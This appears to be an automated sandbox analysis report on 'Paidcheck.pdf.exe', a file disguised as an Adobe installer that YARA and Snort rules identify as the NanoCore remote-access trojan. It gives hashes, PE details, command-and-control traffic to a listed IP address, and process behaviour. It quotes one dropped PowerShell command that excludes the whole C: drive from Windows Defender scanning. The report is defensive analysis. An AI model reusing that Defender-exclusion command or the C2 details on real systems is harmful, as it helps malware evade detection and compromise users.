                                                                          SHA-256:49EDD3825A4186C0CB39926746C6392AF5D1D3905346C6D212A4E877AFFDC259
                                                                          SHA-512:B27C3C71B2C91FEDE5726FC99027E827847DB7F632999B9C42046023799DCBFF55311457E13F1AEFA8F92F0AC99D521FB2BE579FB5E35AF6C2C807651ED6B283
                                                                          Malicious:false
                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210722093401..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'..Process ID: 748..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210722093401..**********************..PS>Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'..**********************..Windows PowerShell transcript start
                                                                          \Device\ConDrv
                                                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1049
                                                                          Entropy (8bit):4.2989523990568035
                                                                          Encrypted:false
                                                                          SSDEEP:24:z3U3g4DO/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zEw4DBXZxo4ABV+SrUYE
                                                                          MD5:970EE6AEAB63008333D1D883327DA660
                                                                          SHA1:A71E19F66886B1888A183BA1777A23FABAE9822E
                                                                          SHA-256:D270D397EB3CF1173D25795834B240466EFEE213E11B1B31CDC101015AFFCAD9
                                                                          SHA-512:EB49AEE1B4524E6F15C08345A380D7D28DC845DEBA5408A7D034F2F7F5A652C8A2E2FF293BFB307DE87DCC2FAA111BA3BE8BEF9C4752A73DE1835DCD844D39BB
                                                                          Malicious:false
                                                                          Preview: Microsoft .NET Framework Assembly Registration Utility version 4.7.3056.0..for Microsoft .NET Framework version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information..

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 6.242459409423084
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: Paidcheck.pdf.exe
File size: 580096
MD5: ce32e8605adb6c9bb2dcee69fe887b46
SHA1: 2ace1fb1e3523768003b61a4a79193214ffafed9
SHA256: 7e22f7f21e8798805234be7ac26bad65c1edecb55b051343e0933a68041ce073
SHA512: 674ad1360e6ed0e1c77865858c08950d6955f8a56544343e9414320470d80258e4fad0d67ee64423cbc792bfbf2cd6fee2c1806a837b61f62b7f71c10fe2d9fc
SSDEEP: 12288:UyVRMbXAPtBXomNFYmujpihOcn92JRVkxdGOcA1WJIq:UyVRxPtB3Cjpihvn+VkxIE1c
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.................0......0........... ........@.. .......................@............@................................

File Icon

Icon Hash: 4e9292f2c88cd3cc

Static PE Info

General

Entrypoint: 0x48c6ea
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0xC8D6E03A [Sat Oct 10 03:15:06 2076 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8c698 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8e000 | 0x2d0c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x92000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8c67c | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8a6f0 | 0x8a800 | False | 0.74459012579 | data | 6.19707511101 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x8e000 | 0x2d0c | 0x2e00 | False | 0.148522418478 | data | 3.29118714119 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x92000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x8e100 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 134217728, next used block 117440512 | |
RT_GROUP_ICON | 0x906b8 | 0x14 | data | |
RT_VERSION | 0x906dc | 0x430 | data | |
RT_MANIFEST | 0x90b1c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2019 Adobe Inc. All rights reserved.
Assembly Version | 2.0.0.592
InternalName | ConsoleApp18709999999999999999.exe
FileVersion | 2.0.0.592
CompanyName | Adobe Inc
LegalTrademarks |
Comments | Adobe Download Manager
ProductName | Adobe Download Manager
ProductVersion | 2.0.0.592
FileDescription | Adobe Download Manager
OriginalFilename | ConsoleApp18709999999999999999.exe

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/22/21-09:33:52.108416 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49704 | 2018 | 192.168.2.3 | 217.138.212.57

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 22, 2021 09:33:50.806400061 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:51.963380098 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:51.963871002 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:52.108416080 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:53.019690990 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:53.019798040 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:53.281886101 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:53.282010078 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:53.799725056 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:53.799973965 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:54.673887014 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:54.712150097 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:55.432821035 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:55.470251083 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:55.487173080 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:55.487313032 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:55.514666080 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:55.542630911 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:55.542725086 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:55.568679094 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:55.598782063 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:55.598872900 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:55.638338089 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:55.673640966 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:55.673707962 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:55.700371027 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:55.727716923 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:55.727771997 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:56.197894096 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:56.224483013 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:56.224617958 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:56.250488997 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:56.273921013 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:56.273997068 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:56.292437077 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:56.328677893 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:56.328763008 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:56.359198093 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:56.386095047 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:56.386173010 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:56.408067942 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:56.432426929 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:56.433077097 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:56.453711987 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:56.488806963 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
Jul 22, 2021 09:33:56.488982916 CEST | 49704 | 2018 | 192.168.2.3 | 217.138.212.57
Jul 22, 2021 09:33:56.507988930 CEST | 2018 | 49704 | 217.138.212.57 | 192.168.2.3
                                                                          Jul 22, 2021 09:33:56.528382063 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.529011011 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.558902025 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.586736917 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.586827993 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.609428883 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.637464046 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.637551069 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.663389921 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.685360909 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.686065912 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.882875919 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.914400101 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.914520979 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.929743052 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.953509092 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.953849077 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.973794937 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.005930901 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.006145000 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.034375906 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.057420015 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.057521105 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.088378906 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.123553038 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.123647928 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.149461985 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.167922974 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.168118000 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.196690083 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.224085093 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.224186897 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.254780054 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.286422968 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.286598921 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.313440084 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.339306116 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.339427948 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.367708921 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.393449068 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.393815994 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.419385910 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.448307037 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.449094057 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.472345114 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.490677118 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.493109941 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.512346029 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.531621933 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.531805992 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.565617085 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.600038052 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.600147963 CEST497042018192.168.2.3217.138.212.57

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 09:32:56
Start date: 22/07/2021
Path: C:\Users\user\Desktop\Paidcheck.pdf.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Paidcheck.pdf.exe'
Imagebase: 0x6a0000
File size: 580096 bytes
MD5 hash: CE32E8605ADB6C9BB2DCEE69FE887B46
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: NanoCore, Description: unknown, Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, Author: Joe Security
• Rule: NanoCore, Description: unknown, Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: NanoCore, Description: unknown, Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation: low

General

Start time: 09:33:42
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
Imagebase: 0x1030000
File size: 147456 bytes
MD5 hash: 7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:33:42
Start date: 22/07/2021
Path: C:\Users\user\AppData\Local\Temp\RegAsm.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\RegAsm.exe
Imagebase: 0x760000
File size: 64616 bytes
MD5 hash: 6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.486430040.0000000003EBC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, Author: Joe Security
• Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:
• Detection: 0%, Virustotal
• Detection: 0%, Metadefender
• Detection: 0%, ReversingLabs
Reputation: high

General

Start time: 09:33:43
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
